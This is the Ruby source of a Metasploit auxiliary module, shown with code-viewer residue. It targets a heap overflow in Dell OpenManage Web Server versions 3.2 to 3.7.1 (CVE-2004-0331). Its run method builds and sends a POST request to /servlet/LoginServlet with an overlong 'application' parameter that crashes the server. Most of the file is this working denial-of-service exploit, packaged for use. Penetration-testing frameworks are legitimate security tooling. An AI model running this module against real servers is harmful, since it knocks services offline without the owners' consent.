66 lines
1.7 KiB
Ruby
66 lines
1.7 KiB
Ruby
|
##
|
||
|
# $Id$
|
||
|
##
|
||
|
|
||
|
##
|
||
|
# This file is part of the Metasploit Framework and may be subject to
|
||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||
|
# Framework web site for more information on licensing and terms of use.
|
||
|
# http://metasploit.com/framework/
|
||
|
##
|
||
|
|
||
|
|
||
|
require 'msf/core'
|
||
|
|
||
|
|
||
|
class Metasploit3 < Msf::Auxiliary
|
||
|
|
||
|
include Msf::Exploit::Remote::Tcp
|
||
|
include Msf::Auxiliary::Dos
|
||
|
|
||
|
def initialize(info = {})
|
||
|
super(update_info(info,
|
||
|
'Name' => 'Dell OpenManage POST Request Heap Overflow (win32)',
|
||
|
'Description' => %q{
|
||
|
This module exploits a heap overflow in the Dell OpenManage
|
||
|
Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability
|
||
|
exists due to a boundary error within the handling of POST requests,
|
||
|
where the application input is set to an overly long file name.
|
||
|
This module will crash the web server, however it is likely exploitable
|
||
|
under certain conditions.
|
||
|
},
|
||
|
'Author' => [ 'patrick' ],
|
||
|
'License' => MSF_LICENSE,
|
||
|
'Version' => '$Revision$',
|
||
|
'References' =>
|
||
|
[
|
||
|
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html' ],
|
||
|
[ 'BID', '9750' ],
|
||
|
[ 'OSVDB', '4077' ],
|
||
|
[ 'CVE', '2004-0331' ],
|
||
|
],
|
||
|
'DisclosureDate' => 'Feb 26 2004'))
|
||
|
|
||
|
register_options(
|
||
|
[
|
||
|
Opt::RPORT(1311),
|
||
|
OptBool.new('SSL', [true, 'Use SSL', true]),
|
||
|
],
|
||
|
self.class)
|
||
|
end
|
||
|
|
||
|
def run
|
||
|
connect
|
||
|
|
||
|
foo = "user=user&password=password&domain=domain&application=" + Rex::Text.pattern_create(2000)
|
||
|
|
||
|
sploit = "POST /servlet/LoginServlet?flag=true HTTP/1.0\r\n"
|
||
|
sploit << "Content-Length: #{foo.length}\r\n\r\n"
|
||
|
sploit << foo
|
||
|
|
||
|
sock.put(sploit +"\r\n\r\n")
|
||
|
|
||
|
disconnect
|
||
|
end
|
||
|
|
||
|
end
|